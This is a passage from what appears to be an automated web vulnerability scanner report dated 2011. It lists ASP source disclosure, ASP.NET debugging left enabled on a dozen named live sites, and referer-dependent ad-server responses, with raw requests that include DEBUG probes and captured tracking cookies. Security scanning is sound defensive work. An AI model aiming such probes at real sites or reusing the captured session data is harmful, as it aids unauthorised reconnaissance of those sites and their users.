   <%
           p_selectOption = 5
           %>
           <!--#INCLUDE Virtual='/includes/brandsites_search_form.asp'-->
...[SNIP]...
19.6. http://www.ronniesmailorder.com/fiche.css  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ronniesmailorder.com
Path:   /fiche.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /fiche.css HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Mon, 12 Oct 2009 12:04:12 GMT
Accept-Ranges: bytes
ETag: "046611c344bca1:7c09"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:06:16 GMT
Content-Length: 7591

.header {width:200px; font-size:16px; white-space:nowrap; text-align:left; font-weight:bold; margin-top:5px; cursor:pointer; }
.content {white-space:nowrap; list-style:none; text-indent:0px; font-siz
...[SNIP]...
amily: Arial; font-size: 11pt; text-decoration: none; font-weight: bold; line-height: 14pt;}
#main {width:590px; vertical-align:top; background-color:white;}
.titleBar {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/center_spacer.gif); height:31px;}
.titleBar_left {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/cat_left_header.jpg); _margin-top:-40px; margin-left:10px; width:22px; height:20px; display:inline;}
.titleBar_middle {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/cat_mid_header.jpg); _margin-top:-39px; margin-left:-5px; height:20px; text-align:center; display:inline;font-family: arial; font-size: 9pt; color:#000000; font-weight:bold;}
.titleBar_right {background-image:url(images/<%=theDealer.Layout.ModImageDir%>/cat_right_header.jpg); _margin-top:-40px; margin-left:-5px; width:22px; height:20px; display:inline;}
.description {color: #34332F; font-family: arial; font-size: 8pt; text-decoration: none; font-wei
...[SNIP]...
20. ASP.NET debugging enabled  previous  next
There are 12 instances of this issue:

20.1. http://www.4yudu.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.4yudu.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.4yudu.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:45:16 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Hosted-By: i4 Solutions
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.2. http://www.abso.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abso.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.abso.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:29:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR NID TAIa OUR NOR" policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.3. http://www.assistedliving.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.assistedliving.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.assistedliving.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:35:48 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.4. http://www.clickinks.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clickinks.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.clickinks.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:49:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.5. http://www.comcastauthorizedoffers.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comcastauthorizedoffers.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.comcastauthorizedoffers.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 00:10:52 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.6. http://www.crankyape.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.crankyape.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.crankyape.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:41:51 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.7. https://www.crankyape.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.crankyape.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 01:53:39 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.8. http://www.freeprintablecalendar.net/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freeprintablecalendar.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.freeprintablecalendar.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:16:36 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.9. http://www.mrsdash.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mrsdash.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.mrsdash.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.10. http://www.skipcain.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.skipcain.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.skipcain.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 01 May 2011 23:55:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.11. http://www.tracklead.net/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tracklead.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tracklead.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Mon, 02 May 2011 00:42:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: LinkTrust
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
20.12. http://www.wvcommerce.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wvcommerce.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wvcommerce.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 02 May 2011 00:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
21. Referer-dependent response  previous  next
There are 4 instances of this issue:

21.1. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Request 1

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:57:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:57:33 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLrTU%2BBtQKqYbLGBFdP17ba%2BTycwBq4TugJerZU5Dhg5679sxNmZljDSuGyM3IsuckPFdnyGwYcRlFzGqvVxSqxKxZLyLTI7oInYpMz9YWyV6T3qq%2BhYuPDQf%2BtVAgDUhuDT9h3CeXw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:57:33 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 01:57:33 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
21.2. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Request 1

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:22:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRjC-6nOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:19 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:19 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:22:19 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:19 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
21.3. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
